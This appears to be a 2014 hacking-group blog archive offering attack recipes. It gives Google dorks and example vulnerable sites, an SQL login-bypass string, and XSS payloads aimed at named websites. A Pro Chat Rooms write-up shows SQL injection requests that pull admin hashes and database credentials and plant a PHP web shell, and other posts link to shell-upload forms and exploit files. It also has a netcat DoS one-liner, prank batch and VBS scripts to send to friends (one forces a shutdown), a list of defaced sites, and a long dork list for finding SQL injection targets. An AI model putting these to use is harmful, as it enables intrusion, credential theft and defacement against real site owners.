Thursday, August 14, 2014

0 GEL CMS 4.0 SQL Injection

2:44:00 PM Under From Admin
[0 Comment]
SQLi Bypass super-admin GEL CMS 4.0

Google Dork: inurl:/contact-us_id7.php
Example Target: http://www.visitbartlesville.com/login.php

Login panel path: http://www.[target].com/login.php

SQL string:

Username: 'or'1'='1
Password: 'or'1'='1
by Facebook Comment
Read More »

Wednesday, August 13, 2014

0 WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

1:34:00 PM Under From Admin
[0 Comment]


WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

Google Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/

Exploit Path : /wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

Example Exploit Path :
http://
/www.[target].com/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

File Upload Path :

http://www.[target].com/wp-content/uploads/ckfinder/files/x.txt

Example Targets :
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
by Facebook Comment
Read More »

Tuesday, August 12, 2014

0 IBM Sametime Meet Server 8.5 Arbitrary File Upload

11:55:00 AM Under From Admin
[0 Comment]

IBM Sametime Meet Server 8.5 Arbitrary File Upload

Google Dork : intitle:"New Meet - IBM Lotus"

Exploit Path : /stconf.nsf/wAttach?OpenForm

Example Target: http://www.[target].com/stconf.nsf/wAttach?OpenForm

Examples:
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm

http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
by Facebook Comment
Read More »

Monday, August 11, 2014

0 Wordpress Js plupload Cross Site Scripting

9:37:00 PM Under From Admin
[0 Comment]


Wordpress Js plupload Cross Site Scripting


Google Dork : inurl:/wp-includes/js/plupload

Exploit Path :
http://www.[target].com/wp-includes/js/plupload/plupload.flash.swf?id=[XSS]

Example Vuln Websites
:

http://nexiran.ir/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

http://wwwxad-qom.ir/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

http://maxewest.com/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

http://mexnter.thieme.com/log/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
by Facebook Comment
Read More »

Sunday, August 10, 2014

0 SHARP MX Series - Denial Of Service

10:23:00 PM Under From Admin
[0 Comment]

SHARP MX Series - Denial Of Service

Google Dork: "SHARP Telnet server"

$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23

$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused

This vulnerability leads to a Denial of Service vulnerability.

Unfortunately, we were unable to retrieve the core dumped but
this flaw might result in a Buffer Overflow allowing remote command execution.

by Facebook Comment
Read More »

2 Make your own fake "virus"

12:22:00 AM Under From Admin
[2 Comment]



How to freak your friends with fake virus


Just copy & paste these codes in notepad and save them as bat or vbs extensions

Send message and shut down his / her computer:

@echo off
msg * I love you ! <3
shutdown -c "Error! Your computer is shit" -s
Save it as "Anything.BAT" in All Files and send it.


Matrix Falling Code Effect:

Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks


Toggle your friend's Caps Lock button simultaneously:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it or open it on your friends pc


To make your own live disco:

1. Open Notepad.
2. Copy paste the exact code given below

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


Continually pop/eject out your friend's CD Drive:

Set oWMP = CreateObject("WMPlayer.OCX.7"
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.


Frustrate your friend by making this VBScript hit Enter simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell"
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell"
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS"


Frustrate your friend by making this VBScript hit Backspace simultaneously:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell"
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS"

Open Notepad continually in your friend's computer:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.

Like our official Facebook fan page for more tutorial :)
https://www.facebook.com/UmbrellaSec
by Facebook Comment
Read More »

Saturday, August 9, 2014

1 Massive defaced by Umbrella Security August 09, 2014

6:08:00 PM Under From Admin
[1 Comment]

Massive defaced by Umbrella Security August 09, 2014


                                          Zone-H Picture:


List of Hacked Websites:
~ http://diyons.com/
~ http://clase.andresbelalcazar.com/
~ http://festisonorocali.com/
~ http://alairefoto.com/
~ http://corporacioncodice.net/
~ http://memoriavisible.com/
~ http://revistavisaje.com/
~ http://tvinfantilygenero.com/
~ http://leclubpublicidad.com/
~ http://comunicaciones.nyorquesta.com/
~ http://childhoodkids.com/
~ http://infashionlg.com/
~ http://elpreciojusto.co/
~ http://velascoestudio.co/
~ http://agromaia.com/
~ http://decointerior.co/
~ http://encoretienda.com/
~ http://oxfjeans.com/
~ http://www.ast.e-mistika.si/
~ http://www.kefalonianet.gr/404.php
~ http://www.sunsetproductions.co/
~ http://www.manhattandigital.co/
~ http://decoloresproducciones.com.co/
~ http://www.erdesign.co/
~ http://fullfitness.com.co/
~ http://hummus.com.co/
~ http://leclub.com.co/
~ http://mayatex.co/
~ http://napoleongoldmine.com/
~ http://tienda.leclub.com.co/
~ http://www.e-astrologija.si/
~ http://www.sumtas.com.tr/
~ http://amarketing.co/
~ http://www.tiltshift.co/
~ http://aguapurahidratante.com/
~ http://feliperestrepo.com/ by Facebook Comment
Read More »

0 WordPress thecotton Themes Remote File Upload

2:40:00 PM Under From Admin
[0 Comment]
WordPress thecotton Themes Remote File Upload 
Google Dork: inurl:/wp-content/themes/thecotton_v114/

Save file as thecotton-wp.php
http://pastebin.com/raw.php?i=6hfNrAKD

After upload you can find your shell there:
http://127.0.0.1/wordpress/wp-content/uploads/2014/9/upload.php by Facebook Comment
Read More »

Friday, August 8, 2014

1 Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

8:56:00 PM Under From Admin
[1 Comment]


Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities

Google Dork: intitle:"Powered by Pro Chat Rooms"

1) Stored XSS
=============

Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can
upload a profile picture containing Javascript code as shown below:

POST: http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg

<script>alert(document.cookie)</script>

By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown
below:

Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">

The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32
digits value as shown below:

http://www.[target].com/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b


2) Reflected XSS
=============

Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:

http://www.[target].com/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</
script>



3) SQL Injection
================

Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application,
parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves
the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:

prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users
SET email = '".$email."',
password='".md5($password)."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users
SET email = '".$email."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'
";

Note that the “makeSafe” function is defined as shown below and will protect against XSS attacks only:

prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
$data = htmlspecialchars($data);

return $data;
}


After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which
will retrieve the MD5 hashed password of the administrator:

POST http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#


The following SQL injection will retrieve the SQL connection string, which probably has clear-text database
credentials.

POST http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#


4) Arbitrary File Upload 
=========================

It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.

The following request will upload a PHP web shell and the web application will return a 32 digit value.

POST: http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream

<?php system($_GET[cmd]);?>

Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">

Since the uploaded web shell is without extension it will not be executed:

http://www.[target].com/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45
<?php system($_GET[cmd]);?>

by Facebook Comment
Read More »

Thursday, August 7, 2014

0 WordPress Dandelion Themes Arbitry File Upload

1:45:00 PM Under From Admin
[0 Comment]

WordPress Dandelion Themes Arbitry File Upload
Google Dork: inurl:/wp-content/themes/dandelion/ 

Download .php file & save as wpupload.php
http://pastebin.com/raw.php?i=WWVN5bQq

You can find your shell at :
http://www.[target].com/uploads/[years]/[month]/shell.php
by Facebook Comment
Read More »

1 WordPress 0day CSRF All Version

10:37:00 AM Under From Admin
[1 Comment]

This tool is public i found something from Mauritania that this tool is coded by him HAH no guys don't be stupid this is not by Mauritania he is liar. So simple this php file is download /wp-config.php from site and read it. The method is old i found him and i use it manual to see how working.

Save as: wpcfg.php
Download Link: http://pastebin.com/raw.php?i=60G2t8ai by Facebook Comment
Read More »

0 WebDav RootKit Tool

12:42:00 AM Under From Admin
[0 Comment]

Download Link: Click Here

Virus Scan Link: Click Here


Google Dorks:
inurl:.asp site:cn
inurl:.asp site:id
inurl:.asp site:kr
inurl:.asp site:in
inurl:.asp site:ru
inurl:.asp site:gr
by Facebook Comment
Read More »

0 Rss aggregator Upload Shell

12:20:00 AM Under From Admin
[0 Comment]


Rss aggregator Upload Shell

# Google Dork : inurl:"/feed-sources"
# Google Dork : inurl:"/top-hits-items"
# Exploit : /upload/feeds_logos/
# Shell : http://www.target.com/upload/feeds_logos/shell.php

Save as: uploader.html

<html>
<title>RSS script Shell Upload Exploit</title>
<center>
# dork : inurl:"/feed-sources" inurl:"/top-hits-items"<br>
# exploit :Test exploit --> /upload/feeds_logos/<br><br>
<form action="http://www.target.com/admin/feeds.php?do=edit&id=1" method="post" enctype="multipart/form-data">
<label for="file">File :</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
by Facebook Comment
Read More »

Wednesday, August 6, 2014

0 Powered by Shop 737 Exploit

7:10:00 PM Under From Admin
[0 Comment]
Google Dork: "powered by shop737"
Google Dork: "/poto/index.php"
Google Dork: "/poto/kategori_1/"
Google Dork: "/poto/upload.php"

Example:
www.[target].com/poto/index.php
to
www.[target].com/poto/upload.php


Default Password
user & pass: admin



Download Shell from there !
Shell Code [shell.php.xxxjpg]
http://pastebin.com/Mj38TPNM


Video Tutorial:
by Facebook Comment
Read More »

Sunday, August 3, 2014

1 JCE Dorks

11:59:00 AM Under From Admin
[1 Comment]


Joomla Component JCE File Upload Dorks


Find us on Facebook: https://www.facebook.com/Official1337/

inurl:/templates/lexicon/
inurl:/templates/beez/
inurl:/templates/atomic/
inurl:/templates/beez2/

inurl:"/images/stories/" intext:"food"
inurl:"/images/stories/" intext:"fruit"

inurl:/administrator/templates/khepri/
inurl:/administrator/templates/system/
inurl:/administrator/templates/bluestork/
inurl:/images/stories/food
inurl:/images/stories/fruit 

intext:"Powered By Joomla 2.5"
intext:"Powered By Joomla 3.x"
intext:"Joomla! Administration Login"
intitle:"Index of /images/stories/" intext:"powered_by.png"

intitle:"Index of /images/stories/" intext:"joomla-dev_cycle.png"
intitle:"Index of /images/stories/food"
intitle:"Index of /images/stories/fruit"
by Facebook Comment
Read More »

2 ASP Dorks

11:54:00 AM Under From Admin
[2 Comment]


These are useful dorks for SQL Injection.

Find us on Facebook: http://www.fb.com
/UmbrellaSec


".asp?bookID="

".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory  ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID=  "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"Store********.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="
by Facebook Comment
Read More »